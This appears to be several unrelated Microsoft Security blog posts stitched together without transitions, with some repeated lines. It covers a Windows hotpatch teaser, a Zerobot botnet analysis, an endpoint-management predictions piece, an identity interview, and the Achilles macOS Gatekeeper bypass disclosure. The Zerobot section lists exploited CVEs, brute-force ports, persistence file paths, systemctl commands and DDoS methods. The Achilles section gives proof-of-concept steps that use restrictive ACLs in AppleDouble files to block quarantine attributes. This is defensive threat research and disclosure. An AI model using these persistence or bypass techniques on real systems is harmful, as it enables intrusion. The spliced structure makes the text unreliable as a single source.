Today we are updating the way Microsoft Security Update Guide (SUG) represents the Windows Hotpatch feature to make it easier for users to identify the hotpatch and security updates. Hotpatching was introduced a year ago as a new way to install updates on supported Windows Server Azure Edition virtual machines (VMs) without requiring a reboot …
Today we are updating the way Microsoft Security Update Guide (SUG) represents the Windows Hotpatch feature to make it easier for users to identify the hotpatch and security updates. Hotpatching was introduced a year ago as a new way to install updates on supported Windows Server Azure Edition virtual machines (VMs) without requiring a reboot after installation.
Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices’ configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services seized by the FBI in December 2022.
Microsoft has previously reported on the evolving threat ecosystem. The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.
In this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet’s recent analysis on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware’s reach to different types of devices. In addition to these findings, we’re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.
What is Zerobot?
Zerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.
The most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.
Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.
How Zerobot gains and maintains device access
IoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.
In addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:
Vulnerability
Affected software
CVE-2017-17105
Zivif PR115-204-P-RS
CVE-2019-10655
Grandstream
CVE-2020-25223
WebAdmin of Sophos SG UTM
CVE-2021-42013
Apache
CVE-2022-31137
Roxy-WI
CVE-2022-33891
Apache Spark
ZSL-2022-5717
MiniDVBLinux
Since the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID “ZERO-32906” for CVE-2018-20057, “GPON” for CVE-2018-10561, and “DLINK” for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.
Microsoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.
Upon gaining device access, Zerobot injects a malicious payload, which may be a generic script called zero.sh that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.
Depending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name FireWall.exe (older versions use my.exe). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.
To achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:
Desktop entry:
Zerobot copies itself to $HOME/.config/ssh.service/sshf then writes a desktop entry file called sshf.desktop to the same directory. Older Linux versions use $HOME/.config/autostart instead of $HOME/.config/ssh.service.
Daemon:
Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
Service:
Copies itself to /etc/sshf and writes a service configuration at /lib/system/system/sshf.service, then enables the service (to make sure it starts at boot) with two commands:
systemctl enable sshf
service enable sshf
All persistence mechanisms on older Linux versions use my.bin and my.bin.desktop instead of sshf and sshf.desktop.
New attack capabilities
In addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.
The following are the previously known Zerobot capabilities:
Attack method
Description
UDP_LEGIT
Sends UDP packets without data.
MC_PING
Meant for DDoS on Minecraft servers. Sends a handshake and status request.
TCP_HANDSHAKE
Floods with TCP handshakes.
TCP_SOCKET
Continuously sends random payloads on an open TCP socket. Payload length is customizable.
TLS_SOCKET
Continuously sends random payloads on an open TLS socket. Payload length is customizable.
HTTP_HANDLE
Sends HTTP GET requests using a Golang standard library.
HTTP_RAW
Formats and sends HTTP GET requests.
HTTP_BYPASS
Sends HTTP GET requests with spoofed headers.
HTTP_NULL
HTTP headers are each one random byte (not necessarily ascii).
Previously undisclosed and new capabilities are the following:
Attack method
Description
UDP_RAW
Sends UDP packets where the payload is customizable.
ICMP_FLOOD
Supposed to be an ICMP flood, but the packet is built incorrectly.
TCP_CUSTOM
Sends TCP packets where the payload and flags are fully customizable.
TCP_SYN
Sends SYN packets.
TCP_ACK
Sends ACK packets.
TCP_SYNACK
Sends SYN-ACK packets.
TCP_XMAS
Christmas tree attack (all TCP flags are set). The reset cause field is “xmas”.
How Zerobot spreads
After persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called new_botnet_selfRepo_isHoneypot, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.
Microsoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called impst.sh:
Figure 1. The impst.sh script used to download the remote administration tool
Defending devices and networks against Zerobot
The continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:
Use security solutions with cross-domain visibility and detection capabilities like Microsoft 365 Defender, which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.
Adopt a comprehensive IoT security solution such as Microsoft Defender for IoT to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.
Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.
Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.
Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.
Harden endpoints with a comprehensive Windows security solution:
Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.
Perform timely cleanup of all unused and stale executables sitting on yours or your organizations’ devices.
Detections
Microsoft Defender for IoT
Microsoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:
CVE-2014-8361
CVE-2016-20017
CVE-2017-17105
CVE-2017-17215
CVE-2018-10561
CVE-2018-20057
CVE-2019-10655
CVE-2020-7209
CVE-2020-10987
CVE-2020-25506
CVE-2021-35395
CVE-2021-36260
CVE-2021-42013
CVE-2021-46422
CVE-2022-22965
CVE-2022-25075
CVE-2022-26186
CVE-2022-26210
CVE-2022-30023
CVE-2022-30525
CVE-2022-31137
CVE-2022-33891
CVE-2022-34538
CVE-2022-37061
ZERO-36290
ZSL-2022-5717
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects the malicious files under the following platforms and threat names:
Zerobot (Win32/64 and Linux)
SparkRat (Win32/64 and Linux)
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:
DEV-1061 threat activity group detected
An active ‘PrivateLoader’ malware process was detected while executing
‘Morila’ malware was prevented
‘Multiverze’ malware was detected
Microsoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:
CVE-2022-22965 (Spring4Shell)
Microsoft Defender for Endpoint’s Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:
CVE-2014-8361
CVE-2019-10655
CVE-2020-25506
CVE-2021-36260
CVE-2021-42013
CVE-2022-30525
CVE-2022-31137
CVE-2022-37061
Devices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.
Microsoft Defender for Cloud
Microsoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:
VM_ReverseShell
VM_SuspectDownloadArtifacts
SQL.VM_ShellExternalSourceAnomaly
AppServices_CurlToDisk
Advanced hunting queries
Microsoft 365 Defender
Microsoft 365 Defender customers can run the following query to find related activity in their networks.
Zerobot files
This query finds the file hashes associated with Zerobot activity.
let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string,
ActivityGroupNames:string)[@"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv"]
with(format="csv", ignoreFirstRecord=True);
let shahashes = IoCList
| where IoC_Type =~ "sha256" and Description =~ "Dev-1061 Zerobot affecting IoT devices"
| distinct IoC;
DeviceFileEvents
| where SHA256 in (shahashes)
Zerobot HTTP requests
This query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.
This query finds incoming connections from IOCs associated with Zerobot activity.
DeviceNetworkEvents
| where RemoteIP in("176.65.137.5","176.65.137.6")
| where ActionType == "InboundConnectionAccepted"
| where Timestamp > ago(30d)
|project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy
Rotem Sde-Or, Ilana Sivan, Gil Regev, Microsoft Defender for IoT Research Team Meitar Pinto, Nimrod Roimy, Nir Avnery, Microsoft Defender Research Team Ramin Nafisi, Ross Bevington, Microsoft Threat Intelligence Center (MSTIC)
The end of the year typically brings with it a small library of reports with predictions for the year ahead. The value in these reports is less in the precise predictions themselves—given how interconnected the world is, no one has a perfect crystal ball. Rather, the forecasts help frame the thinking about the possibilities for the coming year, and what they might mean for you. With that in mind, I would like to share five predictions for 2023 that resonated with me and explain what they could mean for endpoint management in your organization. After reviewing these predictions, I encourage you to review your current endpoint security posture, and how Microsoft Intune can help further improve it in 2023.
1. Strong cloud adoption rates will continue
Macroeconomists may be pessimistic about gross domestic product growth in Europe and the United States in 2023, but even in weak macroeconomic scenarios, cloud growth rates remain stellar.1Gartner® predicts almost 30 percent growth for infrastructure as a service and almost 25 percent growth for platform as a service in 2023, as compared to 2022 in the worldwide public cloud user spending category. A September 2022 survey of chief technology officers (CTOs) by Evercore-ISI asked the top things they would do in response to reduced budgets or inflationary pressure.2 The top answer (from 44 percent of CTOs): increase their use of the cloud. Gartner® predicts that by 2025 more than 90 percent of clients will use cloud-based unified endpoint management (UEM) tools, up from 50 percent in 2022. So, if you have not migrated your UEM to the cloud yet, 2023 is the year to start.
2. Security will remain the top issue for CTOs into 2023
When asked in September about their highest priority project (in terms of incremental spending), 42 percent of CTOs said cloud security. Network security was the second most common response, with analytics third.2 Credit Suisse recently polled CTOs on how different categories in their IT budget would grow.3 In 2021 and 2022, security was ranked top, with an 11 percent increase. Asked to predict the growth in security spending in 2026, security again ranked highest, but the expected increase was even more: 14 percent. Underlying factors provide color to the raw growth numbers. The geopolitical storm continues, and new avenues continue to emerge for hackers. I expect to hear even more about deepfake videos and ransomware as a service in 2023. So, how do chief information security officers (CISOs) strengthen their organization’s defenses in 2023? We would propose two initiatives: first, ensure security software is suitably integrated with a unified console to enable fewer points of vulnerability and more automation. By extension, this might mean consolidating vendors. Second, tackle the human aspect: invest in upskilling staff on how best to be aware of potential attacks.4
3. Worker mobility will increase further
The past few years have changed the model for knowledge workers. 2023 will see several shifts that will add to the hybrid work from anywhere (and hence, protect everywhere) trend. Next year will see mass adoption of 5G capable devices: Juniper Research estimates that there will be 600 million more 5G connections added in 2023 alone.5 Technological trends will be compounded by demographic trends, such as “productivity paranoia,” where workers want to show they are being productive, no matter where they are. What does this mean for CISOs? New working styles, new networks, and new devices mean new attack vectors. In 2023, be ready to protect your workers who are working from anywhere, not just from home.
4. CTOs will need to pay more attention to local factors
There is always a balance between global and local initiatives, but in 2023, we expect that it will be increasingly difficult to just adopt a one-size-fits-all global shortcut. We are seeing an increasing number of national regulations related to data sovereignty, with implications for where that data is stored and secured.6 2023 will see further digital transformation of public sector agencies. These agencies often have more country-specific security or compliance rules compared to their private sector counterparts. As such, CISOs need to ensure their endpoint management solutions (and, indeed, their entire technology architecture) can adapt to handle extra local requirements.
5. Truly transformative technology will rise to the top
My final prediction is that 2023 will see further clarity on the difference between genuinely transformative technology and tech that has been overhyped. One technology that I expect to compare favorably for enterprises in 2023 will be more advanced forms of automation, such as AI. AI start-ups have seen more than USD100 billion in venture capital investment since 2020, in everything from the development of new drugs to new ways to create art and writing (and, perhaps, eventually, transform how blogs are created!).7 Security represents a great opportunity for advanced automation and AI, given the nature of the ongoing problems CISOs must grapple with. As such, while new AI-generated images may garner the headlines, away from the limelight we expect many other enterprise software solutions to benefit from both sophisticated AI and simply greater automation.8 For example, in endpoint management, Gartner® sees that by 2027, UEM and digital employee experience tools will converge—to drive autonomous endpoint management, reducing human effort by at least 40 percent. The more that security tasks are automated, the more time is freed up for more strategic work by your key staff.
Learn more
I hope you found these 2023 trends thought-provoking. I would encourage you to continue to think about what the macro situation might mean specifically for your organization and translate that into an action plan for your Microsoft Intune assets in 2023. In the meantime, I wish you all a safe and thoughtful holiday season and wish you continued success in the new year.
Learn more about how Microsoft Intune can simplify your endpoint management:
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
The security community is continuously changing, growing, and learning from each other to better position the world against cyberthreats. In the latest post of our Community Voices blog series, Microsoft SecuritySenior Product Marketing Manager Brooke Lynn Weenig talks with Christina Richmond, a cybersecurity expert who formerly worked as a Program Vice President at IDC.The thoughts below reflect Christina’s views, not the views of her former employer or Microsoft, and are not legal advice.
Brooke: Christina, thanks for taking the time to share your extensive experience as a cybersecurity analyst and thought leader.
I’ll be asking you about topics that Microsoft customers typically consider in their end-to-end security journey, especially around the foundation of identity and access solutions as the first line of defense in a Zero Trust strategy. Here’s my first question:
What security basics should an organization build into any cloud platform for a strong security foundation?
Christina: I would expect to see a layered approach across the entire environment. Any cloud provider needs to secure their own infrastructure and extend to everything they are offering externally. In the shared responsibility model, the customer of the cloud platform needs to understand where their data is, which is their responsibility, and where the platform is being secured by the cloud provider. It’s important to see that the cloud provider’s physical infrastructure and digital assets are going through the same kind of security, layered approach, or in-depth defense that you would hope to see in any organization.
I also would want to see a cloud provider offer tools to help customers with their side of the shared responsibility model. For example, identity security is your responsibility as an organization, but a cloud provider can help by offering a strong identity and access management program. I would expect identity and data security to be very strong from a cloud provider because those are the new perimeter, and data, of course, is the lifeblood of the organization.
The other thing that I would hope for from a cloud provider is actionable insight into threat actors and the tools and tactics that they are using, plus the monitoring and response services that span a hybrid environment and multicloud environments.
Brooke: How should trust play into security decision-makers’ minds?
Christina: Trust means so many things to so many people. It’s not one thing. When I was at IDC, I defined digital trust solely in terms of security. Now, I look at it from a broader economic perspective, like how a company is transparent about how they are going to use customer data. It is about showing very high principles around their data security.
That would be evidenced by publishing what they do with your data and what choices you have as a consumer of that service. You can choose privacy and have different elections of privacy controls, so that would be transparency around data.
Digital trust involves having a very strong model of ethics around proper data usage, but also ethics more broadly in the community, so not just the data of their consumers but also the data of their partners. Digital trust also has to do with the brand. Do you feel good about a brand? If you see sustainability, strong diversity, equity, and inclusion, and they’re taking care of their organization and presenting a brand that is doing good in the community, that also builds trust.
I like it when organizations are very straightforward and transparent about what they are doing for their employees. “Here is our diversity equity inclusion framework, our mission statement, and what we are doing in the community to give back. Here is how we are being responsible partners for facial recognition, artificial intelligence, and machine learning.” I love it when there is an event in the media—it might be a negative event—and a company comes out right away and says, “This happened, and here is our stance on it” and they are very transparent.
Brooke: What are the most common gaps you are seeing for organizations when securing access?
Christina: There are a ton of gaps. Identities are really complicated. Administrators deal with so much complexity. They must look at multiple dashboards and onboard employees to work on software as a service (SaaS) platforms or cloud platforms or on-premises in their own data centers.
There is a gap in modernizing identity and having one dashboard for visibility. Visibility into apps and services that also need our access control is a huge gap. We do not know what we cannot see, and we cannot protect it if we do not see it. It is important to include those apps and services in identity lifecycle management, and it is a gap for many organizations because it is still new.
Brooke: What should organizations be doing to address the challenge of compromised passwords?
Christina: Before we talk about moving toward passwordless authentication, we need to look a little more deeply at multifactor authentication. It is important, but it is not enough. There are multiple authentication techniques, and we are used to getting a code and putting the code in. That is better than just putting a password in and having to personally manage hundreds of passwords, but there are other things that we can do to bolster multifactor authentication:
Biometrics: We can use facial recognition or a fingerprint on our computer or phone.
Time of access: Time and geolocation are coordinated.
Behavior-based security: Consider how a person holds the phone and how much they shake or move it around and tell if it is in someone else’s hands.
Hard token authentication: Users need a USB drive, keycard, RFID key fob, or another hard token to authenticate.
Passwordless: It helps slow the hacker down because it is much harder to hack. I like passwordless. I just think it still needs a little bit more maturing.
Brooke: What are your thoughts on permissions management in a risk-reduction approach?
Christina: It’s important to have permissions management. There is permission creep, and we need to keep on top of it. Having visibility across your on-premises data center, your multiple data centers, and your multiple clouds is critical.
We lack visibility into identities and permissions, and we struggle with permission creep. We need a comprehensive, unified solution for full visibility and for remediating risk that continuously monitors unused or excessive permissions and is based on least privilege. Least privilege and Zero Trust are vastly different and both are important for varied reasons. Being able to manage all those permissions in a way that provides us with broader visibility and a unified view and does constant monitoring is a critical asset. This could mean flagging that this person or this resource is no longer using their permission, or a person has too much permission based on their title or other factors.
Brooke: Thank you, Christina. I’ve got one closing question on behalf of our readers. As an expert, what do you suggest as the three most important things that organizations should implement for a strong digital identity framework?
Christina: First, identity governance with self-service onboarding is important, so more automation and fewer legacy tools. Second, we need to be moving toward passwordless authentication, and we need to make passwordless easier on the users. Third, organizations need workload identity management because the supply chain is a mess when it comes to tracking who has access to what resource, for what reason, and how broad their permissions are. We need to be able to track that in real-time and do it seamlessly with automation. Permissions management needs to be built-in, but we need to treat workloads, apps, and services as identity so that we can fold that into our permission management and our broader identity access management tools.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”. Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS.
After carefully reviewing the implications, we shared the vulnerability with Apple in July 2022 through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Fixes for the vulnerability, now identified as CVE-2022-42821, were quickly released by Apple to all their OS versions. We note that Apple’s Lockdown Mode, introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles. End-users should apply the fix regardless of their Lockdown Mode status. We thank Apple for the collaboration in addressing this issue.
In this blog post, we share information about Gatekeeper and the vulnerability able to bypass it. We also share this research to emphasize the importance of collaboration among researchers and the security community to improve defenses for the larger ecosystem.
Unlocking the Gatekeeper security mechanism
Many macOS infections are the result of users running malware, oftentimes inadvertently. Fake app bundles might masquerade themselves as different apps, like Flash Player, or as a legitimate file, such as using a PDF icon and using the app name “Resume”. To combat this highly popular infection vector, Apple has imposed strong security mechanisms. When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named com.apple.quarantine and is later used to enforce policies such as Gatekeeper or certain mitigations that prevent sandbox escapes. In recent years, Apple has tightened the security policies even further, and the current Gatekeeper design dictates the following behavior for downloaded apps:
If the app is validly signed and notarized, meaning approved by Apple, then a prompt requires the user’s consent before its launched.
Otherwise, the user is informed that the app cannot be run as it’s untrusted.
Extended attributes are a filesystem feature supported on common macOS filesystems, like APFS and HFS+, and their main purpose is to save file metadata. Specifically, the com.apple.quarantine attribute saves information regarding the source of the downloaded file, as well as data instructing Gatekeeper how to process the file. The attribute format is generally:
flag;date;agent_name;UUID
Extended attributes can be viewed or modified with the xattr command line utility.
A flag value of “0083” enforces Gatekeeper restrictions on the file, as displayed below:
Figure 1. A common com.apple.quarantine extended attribute valueFigure 2. Gatekeeper blocking an untrusted downloaded file
Due to its essential role in stopping malware on macOS, Gatekeeper is a helpful and effective security feature. However, considering there have been numerous bypass techniques targeting the security feature in the past, Gatekeeper is not bulletproof. Gaining the ability to bypass Gatekeeper has dire implications as sometimes malware authors leverage those techniques for initial access.
Historical overview of Gatekeeper bypasses
Numerous Gatekeeper bypasses have been identified in the past years, some even abused by malware families such as Shlayer. When examining Gatekeeper bypasses from recent years, we see two approaches:
Misuse the com.apple.quarantine extended attribute assignment.
Find a vulnerability in the components that enforce policy checks on quarantined files.
Two cases that we don’t consider to constitute a “true” Gateway bypass are:
Using unsupported filesystems, like a USB mass storage device using FAT32, as these require non-trivial user interaction to run macOS applications.
MITRE’s definition of “Gatekeeper Bypass” (T1553.001), which requires code execution to forcefully modify or remove the com.apple.quarantine extended attribute.
Here are some examples of Gatekeeper bypass vulnerabilities discovered over the last several years:
Paths longer than 886 characters were not assigned with extended attributes. Therefore, creating a symbolic link that points to an app that resides in a long path results in a Gatekeeper bypass. Since symbolic links are not assigned with the quarantine attribute, it was possible to completely bypass Gatekeeper, as outlined here.
App bundles with a missing Info.plist and a shell script main executable component are treated incorrectly by syspolicyd, a component that enforces policy restrictions on apps. Writeups can be found here and here.
A security bug in the way files with a “Shebang” (#!) header are interpreted by syspolicyd cause it to consider the app bundle to be safe, as detailed here.
Since symbolic links are not assigned with the quarantine extended attribute, an archive that contains a symbolic link to an app that resides in an external filesystem (NFS) results in a Gatekeeper bypass. Apple fixed the issue by blocking the execution of applications from remote shared locations, documented here.
Quarantine attributes are not checked for JAR files, which are run by Java, as summarized here.
Metadata persistence over AppleDouble
Intrigued by CVE-2021-1810, as listed in the above table, we wondered what mechanism could be leveraged in archives. Considering symbolic links are preserved in archives and aren’t assigned with quarantine attributes—we looked for a mechanism that could persist different kinds of metadata over archives.
After some investigation, we discovered a way to persist important file metadata through a mechanism called AppleDouble.
Even though extended attributes are common on different filesystems, they might be implemented differently or even not supported, so copying files with their metadata becomes a challenging task. To solve this problem, back in 1994, Apple introduced the concept of AppleSingle and AppleDouble formats. In a nutshell, AppleSingle is a binary blob that is added as a part of the original file contents so that there’s only a “single” file to process, whereas AppleDouble saves the metadata in a different file side-by-side next to the original file, with a “._” prefix.
Interestingly, when extracting an archive, macOS processes any attached AppleDouble file and assigns the target file with the appropriate metadata.
The AppleDouble binary file format is quite complicated, but the code that parses it can be read in the XNU git repository in the file that handles extended attributes, which also includes ASCII-art depiction of the format. To demonstrate the AppleDouble file information, we used the ditto utility as such:
Figure 3. AppleDouble file created as “._somefile”
When the file is archived alongside its original file and then extracted by macOS, extended attributes are fully restored, as demonstrated here:
Figure 4. Using AppleDouble in a zip file to preserve extended attributes
Using this newfound knowledge, we examined how we could use the AppleDouble mechanism to trick Gatekeeper in some way.
Our first approach was to generate many large extended attributes in the AppleDouble format such that there won’t be enough space to assign the com.apple.quarantine extended attribute. Interestingly, it doesn’t work—AppleDouble is ignored if the overall size is over 2 GB, and there is no limitation on the number of extended attributes a file could get (besides the size of the disk).
Researching further, we decided to examine the source code of the unarchiving mechanism. Carefully studying the copyfile_unpack implementation, we discovered an option for a special extended attribute named com.apple.acl.text (saved in the XATTR_SECURITY_NAME constant in the source code), which is used to set arbitrary Access Control Lists.
Figure 5. The code that allows setting arbitrary Access Control Lists
Using ACLs for exploitation
Access Control Lists (ACLs) are a mechanism in macOS that further extends the traditional permission model. The traditional permission model saves permission for each file in a file “mode”, which can be changed by using the chmod utility. It enforces permissions on the owning user, owning group, and others in terms of reading (r), writing (w) and launching (x). A file’s mode can be viewed by listing files with the “-l” (long) flag:
Figure 6. Viewing the “hello.sh” file mode, the owner can do anything while others can only read or launch it
Unlike the traditional permission mechanism, ACLs allow fine-grained permissions to files and directories. Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules. Like the file mode, ACLs can be modified with the chmod utility and viewed with the ls utility. It’s important to note that file access checks are dictated by both ACLs and the traditional permission model mechanisms, as demonstrated by the following example:
Figure 7. Denying file reads from everyone makes it impossible to read the file despite its mode
The set of authorizations supported by ACLs is well-documented by Apple in the chmod manual, which contain more than the traditional reading, writing, or launching abilities, including:
writeattr: controls the ability to write attributes to the file
writeextattr: controls the ability to write extended attributes to the file
writesecurity: controls the ability to set ACLs to the file
chown: controls the ability to set the owner of the file
delete: controls the ability to delete the file
Equipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the com.apple.quarantine attribute.
Two minor challenges that we had to overcome during the proof-of-concept (POC) development were:
The format of the ACL text as saved in the AppleDouble file isn’t identical to the format of the chmod command line. This can easily be overcome by invoking the macOS acl_to_text API and saving the ACL with the correct format.
When using the ditto utility, the com.apple.acl.text extended attribute is lost in the resulting AppleDouble file. This can be overcome by either manually creating the binary AppleDouble or, as we chose in this case, simply patching the resulting AppleDouble file before archiving it.
Therefore, our POC is as follows:
Create a fake directory structure with an arbitrary icon and payload.
Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of “everyone deny write,writeattr,writeextattr,writesecurity,chown”). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
Create an archive with the application alongside its AppleDouble file and host it on a web server.
We named our POC exploit Achilles after its use of ACLs to bypass Gatekeeper. Our POC recorded video can be viewed here:
The AppleDouble file we used for this Gatekeeper bypass can be generated, as displayed below:
Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass
Improving security for all through research and threat intelligence sharing
The threat landscape continues to evolve, delivering new threats and attack capabilities that take advantage of unpatched vulnerabilities and misconfigurations as a vector to access systems and data. Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks. Nonetheless, through research-driven protections and collaboration with customers, partners, and industry experts, we strive to enrich our protection technologies to defend against such issues—regardless of the platform or device in use.
As environments continue to rely on a diverse range of devices and operating systems, organizations need security solutions that can provide protection across platforms and a complete picture of their security posture. Collaborative research such as this informs our comprehensive protection capabilities across platforms, allowing Microsoft Defender for Endpoint to deliver and coordinate threat defense across all major OS platforms including Windows, macOS, Linux, Android, and iOS. On macOS devices, Microsoft Defender for Endpoint detects and exposes threats and vulnerabilities, including CVE-2022-42821, using antivirus, endpoint detection and response (EDR), and threat and vulnerability management capabilities. This research also improved Microsoft Defender’s Vulnerability Management capabilities to discover, prioritize, and remediate misconfigurations and vulnerabilities. This includes detecting CVE-2022-42821 on macOS devices by examining AppleDouble files misusing ACLs.
This case also emphasized the need for responsible vulnerability disclosures and expert, cross-platform collaboration to effectively mitigate issues, protecting users against present and future threats. We wish to again thank the Apple product security team for their efforts and responsiveness in addressing the issue.
Figure 8. Generic AppleDouble file that can be used for any Gatekeeper bypass
Our Microsoft security researchers continue to discover new threats and vulnerabilities as part of our effort to secure users’ computing experiences, be it a Windows or non-Windows device. In the effort to improve security for all, we will continue to share intelligence and work with the security community to create and improve upon solutions that protect users and organizations across platforms every single day.
